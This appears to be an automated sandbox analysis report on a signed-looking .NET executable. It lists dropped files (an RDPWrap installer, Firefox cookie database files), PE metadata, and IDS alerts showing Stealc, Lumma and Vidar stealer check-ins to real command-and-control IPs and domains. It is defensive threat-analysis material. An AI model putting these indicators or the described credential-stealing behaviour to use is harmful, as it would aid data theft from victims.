Yara Hits:	Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 47%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...#.CZ.................4..........<7.......P....@..............................................@...................................`...{.......................^...................................................................................text... ........................... ..`.itext..\|....0... .................. ..`.data...x....P.......8..............@....bss.....O...p.......L...................idata...............L..............@....tls.................`...................rdata...............`..............@..@.reloc...^.......`...b..............@..B.rsrc....{...`...\|..................@..@.............p......................@..@................................................................................................

C:\Users\user\AppData\Local\Temp\delays.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	old packed data
Category:	dropped
Size (bytes):	1048575
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L0:L0
MD5:	B8521361BEA0E7DA8BA89EA5B3E149E9
SHA1:	326DEDF369C50C75AA416103B77BC94E3497B1FA
SHA-256:	B55B85471ECEDE8B7A326696B00ED7028C0A60A5BDCC5308152EC31FB3579CE5
SHA-512:	FF973188FFB840438952971D85EA31A4F1EF62BEA7DD707979F082CE25027DE2F961BA66FC06A5B3450D00418ABB19232254628ECA5EDFBEC4DA4040E9941778
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\System32\rfxvmt.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\RDPWInst.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	37376
Entropy (8bit):	5.7181012847214445
Encrypted:	false
SSDEEP:	768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
MD5:	E3E4492E2C871F65B5CEA8F1A14164E2
SHA1:	81D4AD81A92177C2116C5589609A9A08A5CCD0F2
SHA-256:	32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
SHA-512:	59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............\|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\ProgramData\BKJJEBKKEH.exe
File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	33
Entropy (8bit):	2.2845972159140855
Encrypted:	false
SSDEEP:	3:i6vvRyMivvRya:iKvHivD
MD5:	45B4C82B8041BF0F9CCED0D6A18D151A
SHA1:	B4DAD3FFFEF507CBB78671EE620BB495F8CE22F1
SHA-256:	7CFA461ED1FC8611AB74878EDB1FBBDE3596F5D042946A42A7F31EB6D462E628
SHA-512:	B29C3696A8A311EFAF9B9709BA082FF2C8D45A6912D79BC1DE7FEEFBEF8F8DDEFCD6650B5E1165D0A79800C8AED399E2B11BC2431E3837DD8587516BDE50EAB5
Malicious:	false
Preview:	0..1..2..3..4..0..1..2..3..4.....

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.984993579631937
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	334'376 bytes
MD5:	ccc8fb5c5637dd0a4d32552bd9203ce6
SHA1:	3fb0f2b266d91f465e9abb930d85867a65e8eec9
SHA256:	2a9f856bc9fe5a41540aa3800cd8e50adfbfbc3661845a9791c02c13bcadddf6
SHA512:	e5aae05dd623d7f642538b5073ee8d5a95d8152dfe14c73abf4aaa8584217f378fcb988826a9de775a542aeeff3c3d4ed14fb4414da0eb04d8e1eb69d70ef0db
SSDEEP:	6144:QokaBTSIjqhL6fEq3Ko6UasNc8FI+sIFaPsq9Lti8EO:QojBTScq/qqsNlFI+sIFyLEO
TLSH:	E864232C7EE57775FEAA9E7A14734602DBF1A340BB913A4230D24355CE0AB721E061F9
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................>.... ... ....@.. .......................`............`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x45083e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F5DB18 [Thu Sep 26 22:07:20 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/01/2023 01:00:00 17/01/2026 00:59:59
Subject Chain	CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
Version:	3
Thumbprint MD5:	5F1B6B6C408DB2B4D60BAA489E9A0E5A
Thumbprint SHA-1:	15F760D82C79D22446CC7D4806540BF632B1E104
Thumbprint SHA-256:	28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
Serial:	0997C56CAA59055394D9A9CDB8BEEB56

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x507e8	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x52000	0x5c8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x4f400	0x2628
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x54000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x506b0	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x4e844	0x4ea00	c0b16bbc4a0e4c7705949a875ccaac7c	False	0.9924638563195548	Applesoft BASIC program data, first line number 5	7.994047984273234	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x52000	0x5c8	0x600	4b8724cf34813235cb4cd1a072b648ee	False	0.435546875	data	4.1152851568428055	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x54000	0xc	0x200	9bd541c18857ef7d5d68ce253945671f	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x520a0	0x334	data			0.4426829268292683
RT_MANIFEST	0x523d8	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-27T00:14:59.184301+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	49708	46.8.231.109	80	TCP
2024-09-27T00:14:59.363926+0200	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.5	49708	46.8.231.109	80	TCP
2024-09-27T00:14:59.371818+0200	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	46.8.231.109	80	192.168.2.5	49708	TCP
2024-09-27T00:14:59.543492+0200	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.5	49708	46.8.231.109	80	TCP
2024-09-27T00:14:59.553925+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	46.8.231.109	80	192.168.2.5	49708	TCP
2024-09-27T00:14:59.939795+0200	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.5	49708	46.8.231.109	80	TCP
2024-09-27T00:15:00.117427+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49708	46.8.231.109	80	TCP
2024-09-27T00:15:03.529767+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49708	46.8.231.109	80	TCP
2024-09-27T00:15:04.335460+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49708	46.8.231.109	80	TCP
2024-09-27T00:15:05.818930+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49708	46.8.231.109	80	TCP
2024-09-27T00:15:06.370963+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49708	46.8.231.109	80	TCP
2024-09-27T00:15:07.947759+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49708	46.8.231.109	80	TCP
2024-09-27T00:15:08.327617+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49708	46.8.231.109	80	TCP
2024-09-27T00:15:10.214529+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49709	147.45.44.104	80	TCP
2024-09-27T00:15:11.474575+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49709	147.45.44.104	80	TCP
2024-09-27T00:15:11.983773+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49709	147.45.44.104	80	TCP
2024-09-27T00:15:12.812499+0200	2056176	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wallkedsleeoi .shop)	1	192.168.2.5	60401	1.1.1.1	53	UDP
2024-09-27T00:15:13.331398+0200	2056177	ET MALWARE Observed Win32/Lumma Stealer Related Domain (wallkedsleeoi .shop in TLS SNI)	1	192.168.2.5	49710	172.67.194.216	443	TCP
2024-09-27T00:15:14.490721+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49710	172.67.194.216	443	TCP
2024-09-27T00:15:14.490721+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49710	172.67.194.216	443	TCP
2024-09-27T00:15:14.499344+0200	2056164	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop)	1	192.168.2.5	49333	1.1.1.1	53	UDP
2024-09-27T00:15:15.015563+0200	2056165	ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI)	1	192.168.2.5	49712	104.21.4.136	443	TCP
2024-09-27T00:15:16.085743+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49712	104.21.4.136	443	TCP
2024-09-27T00:15:16.085743+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49712	104.21.4.136	443	TCP
2024-09-27T00:15:16.092335+0200	2056162	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop)	1	192.168.2.5	51313	1.1.1.1	53	UDP
2024-09-27T00:15:16.669472+0200	2056163	ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI)	1	192.168.2.5	49714	188.114.96.3	443	TCP
2024-09-27T00:15:17.747671+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49714	188.114.96.3	443	TCP
2024-09-27T00:15:17.747671+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49714	188.114.96.3	443	TCP
2024-09-27T00:15:17.776661+0200	2056160	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop)	1	192.168.2.5	58362	1.1.1.1	53	UDP
2024-09-27T00:15:18.261259+0200	2056161	ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI)	1	192.168.2.5	49716	188.114.97.3	443	TCP
2024-09-27T00:15:18.792727+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49716	188.114.97.3	443	TCP
2024-09-27T00:15:18.792727+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49716	188.114.97.3	443	TCP
2024-09-27T00:15:18.933647+0200	2056158	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop)	1	192.168.2.5	58673	1.1.1.1	53	UDP
2024-09-27T00:15:19.455986+0200	2056159	ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI)	1	192.168.2.5	49719	188.114.96.3	443	TCP
2024-09-27T00:15:19.906123+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49719	188.114.96.3	443	TCP
2024-09-27T00:15:19.906123+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49719	188.114.96.3	443	TCP
2024-09-27T00:15:19.914703+0200	2056156	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop)	1	192.168.2.5	55707	1.1.1.1	53	UDP
2024-09-27T00:15:20.444639+0200	2056157	ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI)	1	192.168.2.5	49721	104.21.58.182	443	TCP
2024-09-27T00:15:20.895417+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49721	104.21.58.182	443	TCP
2024-09-27T00:15:20.895417+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49721	104.21.58.182	443	TCP
2024-09-27T00:15:20.900909+0200	2056154	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop)	1	192.168.2.5	52777	1.1.1.1	53	UDP
2024-09-27T00:15:21.453448+0200	2056155	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI)	1	192.168.2.5	49722	188.114.97.3	443	TCP
2024-09-27T00:15:21.953640+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49722	188.114.97.3	443	TCP
2024-09-27T00:15:21.953640+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49722	188.114.97.3	443	TCP
2024-09-27T00:15:21.957164+0200	2056152	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop)	1	192.168.2.5	62251	1.1.1.1	53	UDP
2024-09-27T00:15:22.464884+0200	2056153	ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI)	1	192.168.2.5	49724	188.114.96.3	443	TCP
2024-09-27T00:15:22.924014+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49724	188.114.96.3	443	TCP
2024-09-27T00:15:22.924014+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49724	188.114.96.3	443	TCP
2024-09-27T00:15:22.958632+0200	2056150	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop)	1	192.168.2.5	62199	1.1.1.1	53	UDP
2024-09-27T00:15:23.483992+0200	2056151	ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI)	1	192.168.2.5	49725	172.67.208.139	443	TCP
2024-09-27T00:15:23.899861+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49725	172.67.208.139	443	TCP
2024-09-27T00:15:23.899861+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49725	172.67.208.139	443	TCP
2024-09-27T00:15:26.237055+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49727	172.67.128.144	443	TCP
2024-09-27T00:15:26.237055+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49727	172.67.128.144	443	TCP
2024-09-27T00:15:36.905688+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49728	104.26.13.205	80	TCP
2024-09-27T00:15:43.835800+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49732	5.75.211.162	443	TCP
2024-09-27T00:15:45.059476+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49733	5.75.211.162	443	TCP
2024-09-27T00:15:46.445166+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49734	5.75.211.162	443	TCP
2024-09-27T00:15:47.152507+0200	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	1	192.168.2.5	49734	5.75.211.162	443	TCP
2024-09-27T00:15:47.812874+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49735	5.75.211.162	443	TCP
2024-09-27T00:15:48.512651+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	5.75.211.162	443	192.168.2.5	49735	TCP
2024-09-27T00:15:49.170784+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49736	5.75.211.162	443	TCP
2024-09-27T00:15:49.880938+0200	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	5.75.211.162	443	192.168.2.5	49736	TCP
2024-09-27T00:15:50.746100+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49737	5.75.211.162	443	TCP
2024-09-27T00:15:51.635237+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49738	5.75.211.162	443	TCP
2024-09-27T00:15:55.078970+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49739	5.75.211.162	443	TCP
2024-09-27T00:15:55.982279+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49740	5.75.211.162	443	TCP
2024-09-27T00:15:57.073883+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49742	5.75.211.162	443	TCP
2024-09-27T00:15:58.109335+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49743	5.75.211.162	443	TCP
2024-09-27T00:15:59.819800+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49744	5.75.211.162	443	TCP
2024-09-27T00:16:01.689288+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49745	5.75.211.162	443	TCP
2024-09-27T00:16:03.359870+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49746	5.75.211.162	443	TCP
2024-09-27T00:16:04.822663+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49747	5.75.211.162	443	TCP
2024-09-27T00:16:06.089475+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49748	5.75.211.162	443	TCP
2024-09-27T00:16:09.599830+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49749	5.75.211.162	443	TCP
2024-09-27T00:16:10.997651+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49750	5.75.211.162	443	TCP
2024-09-27T00:16:12.361487+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49751	5.75.211.162	443	TCP
2024-09-27T00:16:13.770356+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49752	5.75.211.162	443	TCP
2024-09-27T00:16:15.911355+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49753	5.75.211.162	443	TCP
2024-09-27T00:16:17.926798+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49754	5.75.211.162	443	TCP
2024-09-27T00:16:19.368952+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.5	49755	147.45.44.104	80	TCP
2024-09-27T00:16:20.735945+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49756	5.75.211.162	443	TCP
2024-09-27T00:16:20.999843+0200	2056177	ET MALWARE Observed Win32/Lumma Stealer Related Domain (wallkedsleeoi .shop in TLS SNI)	1	192.168.2.5	49757	172.67.194.216	443	TCP
2024-09-27T00:16:21.495636+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49757	172.67.194.216	443	TCP
2024-09-27T00:16:21.495636+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49757	172.67.194.216	443	TCP
2024-09-27T00:16:21.874790+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.5	49755	147.45.44.104	80	TCP
2024-09-27T00:16:21.966314+0200	2056165	ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI)	1	192.168.2.5	49758	104.21.4.136	443	TCP
2024-09-27T00:16:22.443413+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49758	104.21.4.136	443	TCP
2024-09-27T00:16:22.443413+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49758	104.21.4.136	443	TCP
2024-09-27T00:16:22.900430+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49759	5.75.211.162	443	TCP
2024-09-27T00:16:23.007268+0200	2056163	ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI)	1	192.168.2.5	49760	188.114.96.3	443	TCP
2024-09-27T00:16:23.477186+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49760	188.114.96.3	443	TCP
2024-09-27T00:16:23.477186+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49760	188.114.96.3	443	TCP
2024-09-27T00:16:23.948549+0200	2056161	ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI)	1	192.168.2.5	49761	188.114.97.3	443	TCP
2024-09-27T00:16:24.031613+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.5	49755	147.45.44.104	80	TCP
2024-09-27T00:16:24.416856+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49761	188.114.97.3	443	TCP
2024-09-27T00:16:24.416856+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49761	188.114.97.3	443	TCP
2024-09-27T00:16:24.799809+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49762	5.75.211.162	443	TCP
2024-09-27T00:16:24.886227+0200	2056159	ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI)	1	192.168.2.5	49763	188.114.96.3	443	TCP
2024-09-27T00:16:25.540444+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49763	188.114.96.3	443	TCP
2024-09-27T00:16:25.540444+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49763	188.114.96.3	443	TCP
